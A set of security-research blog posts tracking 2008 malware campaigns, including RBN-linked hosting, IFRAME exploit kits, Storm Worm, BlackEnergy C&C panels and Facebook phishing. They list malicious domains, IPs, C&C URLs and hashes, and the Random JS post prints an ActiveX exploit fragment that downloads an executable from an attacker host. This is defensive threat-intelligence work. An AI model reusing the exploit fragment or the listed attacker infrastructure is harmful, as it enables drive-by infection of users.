Statistics from a Malware Embedded Attack

It's all a matter of perspective. For instance, it's one thing to do unethical pen-testing on the RBN's infrastructure, and entirely another to ethically peek at the statistics for a sample malware embedded attack on of the hosts of a group that's sharing infrastructure with the RBN, namely UkrTeleGroup Ltd as well as Atrivo. For yet another time they didn't bother taking care of their directory permissions. Knowing the number of unique visits that were redirected to the malware embedded host, the browsers and OSs they were using in a combination with confirming the malware kit used could result in a rather accurate number of infected hosts per a campaign - an OSINT technique that given enough such stats are obtained an properly analyzed we'd easily come to a quantitative conclusion on a malware infected hosts per campaign/malware group in question.

In this particular case, 99% of the traffic for the last three days came from a single location that's using multiple IFRAMEs to make it hard to trace back the actual number of sites embedded since there's no obfuscation at the first level - vertuslkj.com/check/versionl.php?t=585 - (58.65.239.114) is also loading vertuslkj.com/n14041.htm and vertuslkj.com/n14042.htm. As for the countries where all the traffic was coming from, take a peek at the second screenshot. The big picture has to do with another operational intelligence approach, namely establishing the connections between the malicious hosts that participated in the compaign, in this case it's between groups known to have been exchanging infrastructure for a while.

Continue reading →

Visualizing a SEO Links Farm

This visualization was generated over a month ago, using one of the two search engine optimization link farms I blogged about before, as a sample. Perhaps the most important issue to point out is that the farms are automatically generated with the help of blackhat SEO tools, where the level of internal linking has been set a relatively modest one, as for instance, the core pages extensively link one another, but a huge proportion of the SEO content remains burried in a number of hops a crawler may not be interested in making - this could be automatically taken care of in the process of generating the content to end up with a closed circle when visualizing. Continue reading →

The New Media Malware Gang - Part Three

Boutique cybercrime organizations are on the verge of extinction, and are getting replaced by cybercrime powerhouses, the indication for which is the increase of static netblocks used by well known groups such as the ones I've been exposing for a while - take the New Media Malware Gang for instance, and its entire portfolio of malicious domains that keeps expanding to include the latest ones such as :

sratong.ac.th/ch24/config/index.php
79.135.166.138/us/index.php
users-online.org/get/index.php
x-y-zz.org/exp2/index.php
dimaannetta.ws/adpack/index.php
dagtextiles.biz/adpack/index.php
freescanpro.com/count
keeberg.info
wmstore.info/1
78.109.22.242/a/index.php
208.72.168.176/e-zl0102/index.php
absent09.phpnet.us
podarok24.info/xxx
drl-id.com
supachicks.com

And with Mpack's now easily detectable routines, they're migrating to use the Advanced Pack, a copycat malware exploitation kit, trouble is it's all done in an organized and efficient manner. Continue reading →

Anti-Malware Vendor's Site Serving Malware

Even though AvSoft Technologies isn't really enjoying a large market share, making the impact of this malware coming out of their site even bigger, the irony is perhaps what truly matters in the situation. Some press coverage - Hackers Turn Antivirus Site Into Virus Spreader; Antivirus company's Web site downloads ... a virus; Hackers seed malware on Indian anti-virus site :

"Hackers planted malicious script on the site of an Indian anti-virus firm this week. The website of AVsoft Technologies was attacked by unidentified miscreants in order to distribute a variant of the Virut virus. AVsoft Technologies makes the SmartCOP antivirus package. One of the download pages of the site was boobytrapped with malicious code that used the infamous iFrame exploit to push copies of the Virut virus onto visiting unpatched (or poorly patched) Windows PCs."

The IFRAME at the site used to point to ntkrnlpa.info/rc/?i=1 (85.114.143.207) which also responds to zief.pl, where an obfuscation tries to server ntkrnlpa.info/rc/load.exe through the usual diverse set of exploits served by MPack.

Detection rate : 17/32 (53.13%) for Win32.Virtob.BV; W32/Virut.j

File size: 8704 bytes

MD5: 31f8a31adfdff5557876a57ff1624caa

SHA1: 7f36e192030f7cbd8b47bd2cb9a60e9a3fe384d2

Naturally, according to publicly obtainable data in a typical OSINT style, the domain used to respond to an IP within RBN's previous infrastructure. The big picture is even more ugly as you can see in the attached screenshot indicating a huge number of different malwares that were using ntkrnlpa.info as a connection/communication host in the past and in the present. I wonder would the vendor brag about their outbreak response time regarding the malware that come out of their site in times when malware authors are waging polymorphic DoS attacks on vendors/reseachers honeyfarms to generate noise?

Continue reading →

BlackEnergy DDoS Bot Web Based C&Cs

Remember the Google Hacking for MPacks, Zunkers and WebAttackers experiment, proving that malicious parties don't even take the basic precautions to camouflage their ongoing migration to the web for the purpose of botnet and malware kits C&Cs? Let's experiment wi the BlackEnergy DDoS bot, and prove it's the same situation. What's the BlackEnergy DDoS bot anyway :

"BlackEnergy is an HTTP-based botnet used primarily for DDoS attacks. Unlike mostcommon bots, this bot does not communicate with the botnet master using IRC. Also, wedo not see any exploit activities from this bot, unlike a traditional IRC bot. This is a small(under 50KB) binary for the Windows platform that uses a simple grammar tocommunicate. Most of the botnets we have been tracking (over 30 at present) are locatedin Malaysian and Russian IP address space and have targeted Russian sites with theirDDoS attacks."

The following are currently live botnet C&Cs administration panels, and with BlackEnergy's only functionality in the form of DDOS attacks, it's a good example of how DDoS on demand or DDoS extortion get orchestrated through such interfaces :

httpdoc.info/black/auth.php (66.29.71.16)
wmstore.info/hello/auth.php (216.241.21.62)
lunaroverlord.awardspace.com/auth.php (82.197.131.52)
333prn.com/xxx/auth.php (64.247.18.208)

It's getting even more interesting to see different campaigns within, that in between serving Trojan.Win32.Buzus.yn; Trojan.Win32.Buzus.ym; Trojan-Proxy.Small.DU, there's also an instance of Email-Worm.Zhelatin. A clear indication of a botnet in its startup phrase is also the fact that all the malware binaries that you see in the attached screenshot use one of these hosts as both the C&C and the main binary update/download location. Continue reading →

U.K's FETA Serving Malware

Yet another high-profile malware embedded attack worth commenting on, just like the most recent one at the Dutch embassy in Moscow. Website of UK landmark hacked to serve malware :

"The website of one of the UK's most famous landmarks, the Forth Road Bridge, has been torn open in embarrassing fashion to serve malware, researchers are reporting. According to the security blog of a small consultancy, Roundtrip Solutions, the website is now hosting an 'obfuscated' Javascript hack created using the Neosploit Crimeware Toolkit, dishing out payloads including, the blog reports, porn pop-ups."

The deobfuscated javascript attempts to load the currently live 88.255.90.130/cgi-bin/in.cgi?p=admin (MDAC ActiveX code execution (CVE-2006-0003), also responding to Silentwork.ws and Tide.ws which is deceptively forwarding to BBC's web site, deceptively in the sense that were I to use a U.K based IP to access it for instance it will try to serve the malware, thus, malware campaigners are now able to segment the malware attacks on a basis of IP geolocation. Who's behind it? A group that's in direct affiliation with the RBN and the New Media Malware Gang, where the three of these operate on the same netblocks.

The bottom line - according to publicly obtainable stats and the ever-growing list of high-profile malware embedded attacks, legitimate sites serve more malware than bogus ones as it was in the past in the form of dropped domains for instance. How come? Malware campaigners figured out that trying to attract traffic to their malware domains is more time and resources consuming than it is to take advantage of the traffic a legitimate site is already getting. In fact, they're getting so successful at embedding their presence on a legitimate site that they're currently taking advantage of "event-based social engineering" campaigns by embedding the malware at one of the first five search engine results to appear on a particular event. Continue reading →

GCHQing with the Honeynet Project

Nothing's impossible, the impossible just takes a little longer. If someone told me an year ago that I'll be presenting next to the dudes from the Honeynet Project, I would have been rather skeptical. So, after a week of intensive socializing among geeks, a windy trip to Stonehenge along the way and lots of drinks, it's becoming increasingly clear to me how important face-to-face conversations are for the sake of improving productivity and relationship building. It's also worth pointing out how issues such as dealing with information oveload, data sharing, and actually communicating all the aggregated data to the industry and the general public, need to get a boost especially at the strategic level. And now that I'll be officially joining the organization, stay tuned for for a diverse set of KYE (Know Your Enemy) coverage of the emerging threatscape. Continue reading →

The Shark3 Malware is in the Wild

Life's too short to live in uncertainty, the stakes are too high. A month ago, I indicated the upcoming release of the third version of the script kiddies favorite Shark Malware. Despite that after the negative publicity of the malware that's actually promotd as a RAT, the authors supposedly abondoned the malware, they seem to have logically resumed its development. And so, the Shark3 malware is continuing its development.

What's new? Anti-debugger capabilities in particural against - VmWare, Norman Sandbox, Sandboxie, VirtualPC, Symantec Sandbox, Virtual Box etc.

Detection rate : Result: 15/31 (48.39%) - Backdoor.Win32.Shark.if

File size: 3104768 bytes

MD5: e3a6758f5c90b39b59c6cd7551224d52

SHA1: 25f025f31560a28275aab006e04aace828e012ea

Some key points regarding Shark :

- its do-it-yourself nature, just like many of the malware tools I've covered before is empowering script kiddies with advanced point'n'click capabilities

- built-in spyware functionaly, namely "aggressive service" which resets the start-up values when they're delted, yet another indication that what's pitched as a RAT is in fact malware

- once released in an open source form, a community emerges around it one that starts innovating and coming up with new features

Continue reading →

The Dutch Embassy in Moscow Serving Malware

The Register reports that the Royal Netherlands Embassy in Moscow was serving malware to its visitors at the beginning of last week :

"Earlier this week, the site for the Netherlands Embassy in Russia was caught serving a script that tried to dupe people into installing software that made their machines part of a botnet, according to Ofer Elzam, director of product management for eSafe, a business unit of Aladdin that blocks malicious web content from its customers' networks."

Let's be a little more descriptive. The only IP that was included in the IFRAME was 68.178.194.64/tab.php which was then forwarding to 68.178.194.64/w/wtsin.cgi?s=z. ip-68-178-194-64.ip.secureserver.net (also responding to lmifsp.com and foxbayrental.com) has been down as of 22 Jan 2008 18:56:38 GMT, but apparantly it was also used in several other malware embedded attacks. For instance, the IFRAME is currently active at restorants.ru. The secondary IFRAME is a redirector script in a traffic management script that can load several different URLs, to both, generate fake visits to certain sites that are paying for this, and a live exploit URL as it happens in between.

Historical preservation of actionable intelligence on who's what and what's when is a necessity. Here are for instance two far more in-depth assessments given the exploits URLs were still alive back then, discussing the malware embedded at the sites of the U.S Consulate in St. Petersburg, and the Syrian Embassy in the U.K.

Related posts:
MDAC ActiveX Code Execution Exploit Still in the Wild
Malware Serving Exploits Embedded Sites as Usual
Massive RealPlayer Exploit Embedded Attack
A Portfolio of Malware Embedded Magazines
The New Media Malware Gang
The New Media Malware Gang - Part Two
Another Massive Embedded Malware Attack
I See Alive IFRAMEs Everywhere
I See Alive IFRAMEs Everywhere - Part Two
Have Your Malware in a Timely Fashion
Cached Malware Embedded Sites
Compromised Sites Serving Malware and Spam
Malware Serving Online Casinos Continue reading →

Mujahideen Secrets 2 Encryption Tool Released

Originally introduced by the Global Islamic Media Front (GIMF), the second version of the Mujahideen Secrets encryption tool was released online approximately two days ago, on behalf of the Al-Ekhlaas Islamic Network. Original and translated press release :

"Is the first program of the Islamic multicast security across networks. It represents the highest level of technical multicast encrypted but far superior. All communications software, which are manufactured by major companies in the world so that integrates all services communications encrypted in the small-sized portable. Release I of the "secrets of the mujahideen" the bulletin brothers in the International Islamic Front and the media have registered so scoop qualitatively in the field of information and jihadist exploit the opportunity to thank them for their wonderful and distinctive. And the continuing support of a media jihadist group loyalty in the technical development of a network of Islamic loyalty program and the issuance of this version, in support of the mujahideen general and the Islamic State of Iraq in particular."

Key features in the first version :

-- Encryption algorithms using the best five in cryptography. (AES finalist algorithms)

-- Symmetrical encryption keys along the 256-bit (Ultra Strong Symmetric Encryption)

-- Encryption keys for symmetric length of 2048-bit RSA (husband of a public key and private)

-- Pressure data ROM (the highest levels of pressure)

-- Keys and encryption algorithms changing technology ghost (Stealthy Cipher)

-- Automatic identification algorithm encryption during decoding (Cipher Auto-detection)

-- Program consisting of one file Facility file does not need assistance to install and can run from the memory portable

-- Scanning technology security for the files to be cleared with the impossibility of retrieving files (Files Shredder)

New features introduced in the second version :

-- Multicast encrypted via text messages supporting the immediate use forums (Secure Messaging)

-- Transfer files of all kinds to be shared across texts forums (Files to Text Encoding)

-- Production of digital signature files and make sure it is correct

-- Digital signature of messages and files and to ensure the authenticity of messages and files

So far, Reuters picked up the topic - Jihadi software promises secure Web contacts :

"The efficacy of the new Arabic-language software to ensure secure e-mail and other communications could not be immediately gauged. But some security experts had warned that the wide distribution of its earlier version among Islamists and Arabic-speaking hackers could prove significant. Al Qaeda supporters widely use the Internet to spread the group's statements through hundreds of Islamist sites where anyone can post messages. Al Qaeda-linked groups also set up their own sites, which frequently have to move after being shut by Internet service providers."

Needless to say that the new features, even the fact that they've updated the program has to be discussed from a strategic perspective. The improved GUI and the introduction of digital signing makes the program a handy tool for the desktop of the average cyber jihadist, average in respect to more advanced data hiding techniques, ones already discussed in previous issues of the Technical Mujahid E-zine. With the tempting feature to embedd the encrypted message on a web page instead of sending it, a possibility that's always been there namely to use the Dark Web for secure communication tool is getting closer to reality. Knowing that trying to directly break the encryption is impractical, coming up with pragmatic ways to obtain the passphrase is what government funded malware coders are trying to figure out. Screenshots courtesy of the tool's tutorial.

Continue reading →

E-crime and Socioeconomic Factors

Interesting points by F-Secure with two main issues covered, namely the lack of employment opportunities for skilled IT people who turn to cyber crime to make a living, and the emerging economies across the globe, whose citizens in their early stages of embracing new economic models will suffer from the inevitable unequal distribution of income due to their government's lack of experience or motivation. To me, however, it's more sociocultural than socioeconomic factors that contribute to these future developments. Several more key points worth discussing :

- Malware is no longer created, it's being generated

The myth of someone reinventing the wheel, namely coding a malware bot from scratch is no longer realistic. Modern malware is open source, modular, localized to different languages, comes with extensive documentation/comments and HOWTO guides/videos. Moreover, these publicly obtainable open source malware bots were released in the wild for free, namely, the coders that originally started the "generators" or the "compilers" generation took, and enjoyed only the fame that came with coming up with the most widely used and successful bot family. Take Pinch for instance and the recent arrest of the "coders". New and improved versions of Pinch are making their rounds online, but how is this possible since the people behind it are no longer able to update it? To achieve immortality for Pinch, they've released it as open source tool, namely anyone can use its successful foundation for any other upcoming innovation. The original coders are gone, the "malware generators" and the "compilers" are cheering since they still have access to the tool. Another popular entry obstacle such as advanced coding skills is gone, anyone can compile, generate and spread the samples, or used them for targeted attacks.

- "Will code malware for food" type of individuals don't really exist anymore

A cat doesn't eat mice when it's hungry, it eats mice when it's already been fed, and therefore does it for prestige and entertainment. Storm Worm is not released by the "desperation department", it's an investment on behalf of someone who will monetize the infected hosts, or who has outsourced the infection process to botnet aggregators. Moreover, there's no lack of IT employment opportunities in times of growing economy, exactly the opposite, the economy is booming, investments are made in networks and infrastructure and therefore people will start receiving incentives for training and therefore the demand for IT experts will increase given the government is visionary enough to invest in the long-term, in terms of education and training. If it's not, structural unemployment will undermine the local industry, you'll end up with software engineers working at the local McDonald's during the day, and coding malware during the night - a stereotype. For instance, go through this article and notice the quote regarding the attitude towards the U.S. Malware coders/generators aren't on the verge of starvation, they're on a mission with or without actually realizing it :

"I don't see in this a big tragedy," said a respondent who used the name Lightwatch. "Western countries played not the smallest role in the fall of the Soviet Union. But the Russians have a very amusing feature — they are able to get up from their knees, under any conditions or under any circumstances. As for the West? "You are getting what you deserve."

It's a type of "Why are you doing me a favour that I still cannnot appreciate?" issue, collectivism vs individualistic societies. E-crime is not just easy to outsource, but the entry barriers in space are so low, we can easily argue it's no longer about the lack of capabilities, but the lack of motivation to participate, and actually survive, that drive E-crime particularly in respect to malware. From an economic perspective, the Underground Economy's high liquidity is perhaps the most logical incentive to participate, which is a clear indication on the transparency and communication that parties involved have managed to achieve. Continue reading →

DIY Fake MSN Client Stealing Passwords

This tool deserves our attention mostly because of its do-it-yourself (DIY) nature, just like the many other related ones I discussed before. Custom error messages, two options for to kill or restore MSN after the password is obtained, and custom FTP settings to upload the accounting data. Why did they choose FTP compared to email as the leak point for the data? From my perspective uploading the accounting data on an FTP server means compatibility from the perspective of easily obtaining the accounting data to be used as foundation for another MSN spreading malware or spim, compared to accessing it from an email account.

File size: 888832 bytes
MD5: 02b0d887aa1cbfd4f602de83f79cf571
SHA1: da49527e96bb998b3763c1d45db97a4d3bccea7a

A sample is detected as W32/VB-Remote-TClient-based!Maximus.

In related news, MSN is said to be the most targeted IM client :

"Within the IM category, 19 percent of threats were reported on the AOL Instant Messenger network, 45 percent on MSN Messenger, 20 percent on Yahoo! Instant Messenger and 15 percent on all other IM networks including Jabber-based IM private networks. Attacks on these private networks have more than doubled in share since 2003, rising from seven percent of all IM attacks to 15 percent in 2007."

As always, it's a matter of a vendor's sensors network to come up with increasing or decreasing levels of a particular threat, but the pragmatic reality nowadays has to do with less IM spreading malware, and much, much more malware embedded trusted web sites.

Moreover, according to some publicly obtainable stats, IM spreading malware in general has been declining for the past two years, but how come? It's because of their broken and bit outdated social engineering model, namely the lack of messages localization, abuse of public events as windows of opportunities, and the lack of any kind of segmentation. One-to-many may be logical from an efficiency point of view, but it's like embedding a single exploit on hundreds of thousands of sites compared to a set of exploits, or a set of techniques like in this case. Continue reading →

Storm Worm's St. Valentine Campaign

The Riders on the Storm Worm started riding on yet another short term window of opportunity as always - St. Valentine's day with a mass mailing email campaign linking to two files with_love.exe and withlove.exe, using an already infected host as a propagation vector itself in the very same fashion they've been doing so far.

Detection rate : 3/32 (9.38%)
File size: 114689 bytes
MD5: 31ac9582674cad4c8c8068efb173d7c7
SHA1: cee93d3021318a34e188b8fae812aa929cb2bc9c

NOD32v2 - a variant of Win32/Nuwar
Prevx1 - Stormy:All Strains-All Variants
Webwasher-Gateway - Win32.Malware.gen!88 (suspicious)

The binary drops burito.ini (MD5 - A65FA0C23B1078B0758B80B5C0FD37F3) and burito1205-67d5.sys (MD5 - C4B9DD12714666C0707F5A6E39156C11), and creates the following registry entries :

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_BURITO1205-67D5 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_BURITO1205-67D5\0000 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\burito1205-67d5 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\burito1205-67d5\Security

Surprisingly, there are no client-side vulnerabilities used in last two campaigns. Continue reading →

The Random JS Malware Exploitation Kit

The Random JS infection kit as originally named by Finjan, is perhaps the first publicly announced malicious innovation for 2008, in fact I've managed to obtain a copy of a sample .js and witness the filename change on the next request combined with complete disappearance of any .js on the third visit. Here's some press coverage - "Over 10,000 trusted websites infected by new Trojan toolkit" :

"The random js attack is performed by dynamic embedding of scripts into a webpage. It provides a random filename that can only be accessed once. This dynamic embedding is done in such a selective manner that when a user has received a page with the embedded malicious script once, it will not be referenced again on further requests. This method prevents detection of the malware in later forensic analyses."

And several more articles - "Hacking Toolkit Compromises Thousands Of Web Servers" ; "Trojan toolkit infected 10000 Web sites in December" ; "Legitimate sites serving up stealthy attacks". Compared to all of the malware embedded attacks during 2007 which were serving the malware from a secondary domain, as well as the exploits themselves, in attack technique is hosting everything on the infected domain. Sample random and local malware locations :

bunburyymas.com/ihkxtmzl

bunburyymas.com/odjiffkl

techicorner.com/bcuoixqf

otcash.com/ktehxwmj

otcash.com/soqutkue

otcash.com/bemkwijz

Sample .js random filenames :

cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js;

Sample malware hosting URL snippet :

bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(

Copies of the malware obtained mosvs8.exe -- and logically submitted to each and every anti virus vendor on behalf of VirusTotal just like every sample I ever came across to in the incident responses -- attempt to connect to 206.53.51.75, 206.53.56.30, and back39409404.com, making naughty web requests such as :

206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e

&uptime=00:00:58:38

back39409404.com/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e

&uptime=00:00:58:35

The following files are partly accessible at the still active C&C's, the first one for instance :

cgi-bin/forms.cgi

cgi-bin/cert.cgi

cgi-bin/options.cgi

cgi-bin/ss.cgi

cgi-bin/pstore.cgi

cgi-bin/cmd.cgi

cgi-bin/file.cgi

Did anti virus vendors come up with a detection pattern for the .js already? Partly.

Detection rate : Result: 11/32 (34.38%) JS.IEslice.aq; JS/SillyDlScript.DG; Exploit:JS/Mult.K

File size: 31679 bytes

MD5: 93152dc2392349d828526157bf601677

SHA1: 1b10790d16c9c0d87132d40503b37f82b7f03560

And now that we've witnessed the execution of such an advanced and random attack approach limiting the possibilities for assessing the impact of a malware embedded attack the way it was done so far, we can only speculate on what's to come by the end of the first quarter of 2008. From my perspective however, the smartest thing in this type of attack technique is that they limit the leads they leave behind to the minimum, thus, forwarding the responsibility to the infected host and limiting the possibility for easy expanding of the rest of their ecosystem. Moreover, despite that the module or the actual kit if it's really a kit is a Proprietary Malware Tool for the time being, it will sooner or later leak out, and turn into a commodity, just like MPack and IcePack are these days.

Continue reading →

RBN's Fake Account Suspended Notices

In the last quarter of 2007, under the public pressure put on the Russian Business Network's malicious practices, the RBN started faking the removal of malicious domains from its network by placing fake account suspended notices, but continuing the malware and exploit serving campaigns on them. And since I constantly monitor RBN activity, in particular their relationship with the New Media Malware Gang and Storm Worm, a relationship that I've in fact established several times before, a recently assessed malicious domain further expands their underground ecosystem. Let the data speak for itself :

dev.aero4.cn/adpack/index.php (195.5.116.244) once deobfuscated loads dev.aero4.cn/adpack/load.php :

Detection rate : 11/32 (34.38%)
File size: 6656 bytes
MD5: 5eb0ee32613d8a611b6dc848050f3871
SHA1: 55c0448645a8ed2e14e6826fae25f8f9c868be30

It gets even more interesting as the downloader attempts to download the following :

88.255.94.250/s2/200.exe
88.255.94.250/s2/m.exe
88.255.94.250/s2/d.exe
88.255.94.250/s2/un.php

And as I've already pointed out in a previous post, 88.255.94.250 is the New Media Malware Gang. Moreover, next to m.exe and d.exe with an over 50% detection rates, 200.exe is impressively detected by one anti virus vendor only :

Detection rate : 1/32 (3.13%)
File size: 33280 bytes
MD5: 9bf9265df5dea81135355d161f3522be
SHA1: 44cdcaf5e8791e10506e3343d73a2993511fa91f

Further continuing this assessment, firewalllab.cn (203.117.111.106) also responds to aero4.cn, and is hosted at AS4657 STARHUBINTERNET AS Starhub Internet Pte Ltd 31, Kaki Bukit Rd 3 SINGAPORE (previously known as CyberWay Pte Ltd). Even more interesting is the fact that 203.117.111.106 is also responding to known New Media Malware Gang domains :

businesswr.cn
fileuploader.cn
firewalllab.cn
otmoroski.cn
otmoroski.info
security4u.cn
tdds.ru
traffshop.ru
x-victory.ru

Furthermore, 203.117.111.106 seems to have made an appearance at otrix.ru, where in between the obfuscation an IFRAME loads to 58.65.233.97/forum.php, where two more get loaded 4qobj63z.tarog.us/tds/in.cgi?14; 4qobj63z.tarog.us/tds/in.cgi?15. Deja vu, again, again and again - 4qobj63z.tarog.us was among the domains used in the malware embedded attack again the French government's site related to Lybia, and there I made the connection with the New Media Malware Gang for yet another time.

There's indeed a connection between the RBN, Storm Worm and the The New Media malware gang. The malware gang is either a customer of the RBN, partners with the RBN sharing know-how in exchange for infrastructure on behalf of the RBN, or RBN's actual operational department. Piece by piece and an ugly puzzle picture appears thanks to everyone monitoring the RBN that is still 100% operational. Continue reading →

PAINTing a Botnet IRC Channel

I suppose that even for a script kiddie it takes extra time and patience to come up with such a spoofed IRC channel getting crowded with infected hosts. Drawing courtesy of a script kiddie's wishful thinking. Here are some screenshots from the real world, and some of the most recent developments I covered in previous posts. Continue reading →

The Pseudo "Real Players"

What happened with the recent RealPlayer massive embedded malware attack? Two of the main hosts are now, and the third one ucmal.com/0.js is strangely loading an iframe to ISC's blog in between the following 61.188.39.218/pingback.txt which was returning the following message during the last couple of hours "You're welcome for being saved from near infection".

As I'm sure others too like to analyze post incident response behavior of the malicious parties, in respect to this particular attack, during the weekend they took advantage of what's now a patent of the Russian Business Network, namely to serve a fake 404 error message but continue the campaign. However, in RBN's case, only the indexes were serving the fake account suspended messages, but the campaign was still active on the rest of the internal pages. In the RealPlayer's campaign case, the 404 error messages themselves were embedded with the same IFRAMEs as well, in order to make it look like there's an error, at least in front of the eyes of the average Internet user.

Despite that the main campaign domains are blocked on a worldwide scale, the hundreds of thousands of sites that originally participated are still not clean and continue trying to load the now down domains. Moreover, the big picture has to do with a fourth domain as well, yl18.net/0.js, that used to be a part of the same type of massive malware embedded attack in November, 2007.

Why pseudo "real players" anyway? Because for this attack, they took advantage of what can be defined as a fad, namely the use seperate exploit as the cornerstone of the campaign, at least if its massive infection they wanted to achieve. The "real players" or script kiddies on the majority of occasions, serve exploits on a client-side matching basis, and therefore the more diverse the exploits set, the higher the probability a vulnerable application will be detected and exploited. Therefore, given the number of sites affected it could have been much worse than it is currently based on speculations of the success rate of the campaign in terms of infections, not the sites affected - a success by itself. Execution gone wrong given the foundation for the attack - until the next time. Continue reading →

Malware Serving Exploits Embedded Sites as Usual

The combination of the recent RealPlayer exploit and MDAC is a fad, but the very same is getting embraced in the short-term by malicious parties in China that have also started combining the Internet Explorer VML Download and Execute Exploit (MS07-004), thanks to recent localized forum postings on modifying the third exploit. Let's assess several sample domains.

8v8.biz/ms07004.htm (58.53.128.98) is such a domain that's serving a combination of these starting with Exploit-MS07-004 :

Result: 12/32 (37.5%)
File size: 3432 bytes
MD5: bafab9b8e38527e9830047fd66b39532
SHA1: b81abcf63a2c4bcf43526f28aec20fca2f58d67c

8v8.biz/1.htm - MDAC also loads 8v8.biz/06014.html in between 8v8.biz/r.htm - real player unobfuscated, wheere all of these attempt to load 8v8.biz/v.exe - Worm.Win32.AutoRun.bkx; Win32/Cekar!generic

Result: 27/31 (87.10%)
File size: 19501 bytes
MD5: 7b101f7baeae0ebab9ecc06fdb9542dc
SHA1: 36ffa50ce3873fb04c13c80421c205a7760f47ca

The binary is using a default set of known executables of anti malware products, and is installing a default debugger injected upon execution of any of these, and is therefore successfully killing many of the applications.

Another exploit serving domain with a very diverse set of exploits used, but again serving the faddish RealPlayer plus MDAC combination is uc147.com (218.107.216.85) :

uc147.com/test/MS07004.htm
uc147.com/test/PPs.htm
uc147.com/test/biaxing06014.Htm
uc147.com/test/index.htm
uc147.com/test/Click_here.html
uc147.com/test/PPLIVE.htm
uc147.com/test/Thunder.html
uc147.com/test/bf.htm
uc147.com/test/Open.htm
uc147.com/test/ms06014.htm
uc147.com/test/jetAudio%207.x.htm

where all are trying to load uc147.com/zy.exe :

Result: 24/32 (75%)
File size: 15456 bytes
MD5: 3a0804d8e12706e97cdda6aa4f50ef5f
SHA1: cfd2f158a658dc0d8618c35806b94008b4fb1c0f

The third domain is great example of what's an emerging trend rather than a fad, namely the use of comprehensive multiple IFRAMES loading campaigns. qx13.cn/3.htm (61.174.61.94) (IE COM CreateObject Code Execution (MS06-042) which loads sp.070808.net/23.htm, (75.126.3.218) where the following try to load as well :

sp.070808.net/in.htm
wc.070808.net/37.htm
az.sbb22.com/hh.htm
um.uuzzvv.com/uu.htm
fa.55189.net
acc.jqxx.org/40.htm
ktv.mm5208.com/25.htm

Two other IFRAMES within within qx13.cn/3.htm, w.aeaer.com/ae.htm (75.126.3.216) loads the same IFRAMES, and qi.ccbtv.net/btv.htm (66.90.79.138) again loads the same IFRAMEs. It gets even more complicated and the ecosystem more comprehensive as the secondary IFRAMEs logically load many others such as :

68yu.cn/s29.htm
ermei.loveyoushipin.com/pic/9041.htm
yun.yun878.com/web/6619038.htm
ppp.749571.com/ww/new82.htm
2.xks08.com/dm1.htm?60
ad.2365.us/110

The more complicated and dynamic these IFRAME-ing attacks get, the higher the campaign's lifecycle becomes, making it harder the determine where's the weakest link, and making it easier for the malicious parties to evaluate which node needs a boost by including new domains spread across different netblocks like this case. Continue reading →

The Invisible Blackhat SEO Campaign

Count this as a historical example of a blackhat SEO campaign, and despite that "Fresh Afield's" blog (blogs.mdc.mo.gov) is now clean, cached copies confirm the existence of hidden links that were embedded on each and every post on it, apparently due to a compromise. The blackhat SEO links invisible embedded within the blog's posts on the other hand point to a compromised account at the Texas A&M University (aero.tamu.edu/people/raktim), as you can see in the screenshot. Moreover, there's also a visible part of the campaign that was located under blogs.mdc.mo.gov/custom/?0f, and as usual, once the blackhat SEO pages were either uploaded or embedded like it happened in this case, the campaigns under the blogs.mdc.mo.gov URL were spammed across the Internet. Continue reading →

MySpace Phishers Now Targeting Facebook

The "campaigners" behind the MySpace phishing attack which I briefly assessed in previous posts seem to have started targeting Facebook as well. Ryan Singel comments, and quotes me in a related article :

"Hackers for the first time are targeting the popular social networking site Facebook with a phishing scam that harvests users' login details and passwords. Some Facebook users checking their accounts Wednesday found odd postings of messages on their "wall" from one of their friends, saying: "lol i can't believe these pics got posted.... it's going to be BADDDD when her boyfriend sees these," followed by what looks like a genuine Facebook link. But the link leads to a fake Facebook login page hosted on a Chinese .cn domain. The fake page actually logs the victims into Facebook, but also keeps a copy of their user names and passwords."

Compared to their previous MySpace phishing campaign that was also serving malware in between, this was was purely done for stealing accounting data of Facebook users only. And as we're on a Facebook malicious campaigns topic, impersonating Facebook's login or web presence from a blackhat SEO perspective to serve malware is always trendy. Take this fake facebook login subdomain serving malware for instance - facebook-login.vylo.org (209.160.73.132) redirects to iscoolmovies.com/movie/black/0/2/541/1/ which attempts to load 209.160.73.132/download/502/541/1/ where 209.160.73.132/dw.php is the adware in this case - Adware:Win32/SmitFraud. And yet another one - facebook-login-61248sf1.krantik.info (89.149.206.225) whose once deobfuscated javascript attempts to load topsearch10.com/search.php (209.8.25.156). Spammy, yammy. Continue reading →